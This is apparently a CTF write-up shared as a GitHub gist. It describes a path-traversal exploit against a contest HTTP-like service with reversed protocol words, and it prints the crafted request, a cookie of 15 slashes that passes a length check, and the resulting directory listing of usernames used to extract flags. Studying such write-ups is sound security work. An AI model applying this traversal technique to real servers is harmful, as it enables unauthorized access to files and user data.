Skip to content

Instantly share code, notes, and snippets.

Created May 29, 2019
What would you like to do?


We noticed that server logs debug info to the stdout. First idea was path traversal, because server stores files with the names from the requests: path = './' + eikooc + '/' + path Path traversal in the path didn't work at all, but eikooc (reversed cookie) was a user directory. So we sent such payload:

TEG / PTTH\1.1
eikooc: ../

And we got log message:


TEG / PTTH\1.1

eikooc: eikooc: ../

found cookie
[PID 20] [] Fucked up cookie. CLIENT

Ok, we checked condition for this message:

if (some_function(some_ptr) == 15)
} else {
  throw_error("Fucked up cookie.");

Hmm, it looks like some_function is just strlen and some_ptr is eikooc pointer. And finally we sent such payload (with exactly 15 slashes in the eikooc):

TEG / PTTH\1.1
eikooc: ////////////////////

PTTH\0.1 2 KO
eikooc: ///////////////
eicookh: 093edf9115dc3ca072233b96e38f2752

<title>Index of data</title>
<h1>Index of data</h1>
<a href="./">(Parent Directory)</a><br>
<a href="data/MskBs9WDwWdlj1p">MskBs9WDwWdlj1p</a><br>

Got it! This request lists all usernames and now we can extract all flags the same way as jury does.


Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment